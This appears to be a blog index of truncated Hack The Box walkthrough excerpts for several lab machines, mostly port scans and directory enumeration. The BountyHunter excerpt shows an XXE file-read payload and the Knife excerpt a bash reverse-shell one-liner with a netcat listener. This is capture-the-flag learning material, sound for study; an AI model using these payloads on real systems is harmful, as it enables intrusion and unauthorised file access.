HTB BountyHunter

$ nmap -A -T4 -v Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) As we can observe in Burp, data is URL+base64 encoded. It’s XML data, so could try an XXE. Using Cyberchef ( on we also find : <!DOCTYPE replace [<!ENTITY xxe SYSTEM «php://filter/convert.base64-encode/resource=file_to_use»> ]> We can use to check other files

HTB Love

$ nmap -A -p- -T4 Open ports: 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) ssl-cert: Subject: 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) 5040/tcp open unknown 5985/tcp open http Microsoft HTTPAPI httpd

HTB Knife

$ nmap $ nmap -p- -v $ whatweb $ searchsploit php 8.1.0-dev $ searchsploit -m php/webapps/ $ python3 $ id Using this exploit we get a reverse but it is not very useful, we can try to get a better one. $ python3 -u -c «/bin/bash -c ‘/bin/bash -i >& /dev/tcp/ 0>&1′»$ sudo nc -lvnp 4444 james@knife:/$ ls james@knife:/$ cd /homejames@knife:/home$ ls james@knife:/home$


$ nmap -A -p- -T4 -Pn Open ports : 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn Dashboard Security Snapshot IP Config Network status Security Snapshot Using Burp we can discover the content of the site and discover if there is anything else in content data. Using Burp Discover functionality we can obtain also if

HTB Explore

Rustscan is a fast port scanner that promises to scan all 65k ports in 3 seconds.We can use it to perform a full port scan and with the results, we can use them in combination with Nmap. $ rustscan -a $ sudo nmap -sV -sC -p 2222,42135,42507,59777 In the port scan, we found different open ports.As usually, ssh port is not a common port to start testing so,

HTB Scriptkiddie

$ nmap -A -p- -T4 Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) Accessing to In this site we can observe that nmap and msfvenom are used. $ searchsploit msfvenom From nmap we don’t get too much from searchploit, but from msfvenom we just get 1 result.So it is worth trying. msf6 > search venom

HTB Delivery

Add the box to the host file. $ sudo nano /etc/hosts $ nmap delivery.htb -A -p- -T4 Open ports: Site inspection: http://delivery.htb http://delivery.htb/#contact-us http://delivery.htb:8065 As you can create a user into Mattermost server we can start here: http://delivery.htb:8065/should_verify_email? We should verify the email, but no email is going to be received.So we need to find a new way. If we focus on Helpdesk site, We can create a

HTB Academy

$ sudo nano /etc/hosts $ nmap academy.htb -A -p- -T4 Open ports: 22(tcp) – ssh 80(tcp) – http 33060(tcp) – mysql Access to http://academy.htb $ python ~/tools/dirsearch/ -u http://academy.htb http://academy.htb/admin.php http://academy.htb/register.php After this step, we would be able to log in to this site. Inspecting with Burb Suite the request when we register our user we can observe: What would happen if we change this value when creating a new user? Modify

HTB Heist

$nmap -sC -sV -oA all -vv -p- $gobuster dir -u -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e $gobuster dir -u -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php Accessing to There is a «Login as Guest» option. There is an «Attachment» link. The message talks about a Cisco Router. Hazard said to create a user account for him. So it should be a «hazard» username. Testing admin credentials we’ve just found. we need an

HTB Traceback

$nmap -A -T4 -p- Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 80/tcp open http Apache httpd 2.4.29 Access to Can we assume that there is a Web-shell in this box? Let’s try to find out. $gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e With our usual wordlist, there aren’t interesting results. Let’s try a different one taking into account the comment of the main site that talked about web-shells… $gobuster dir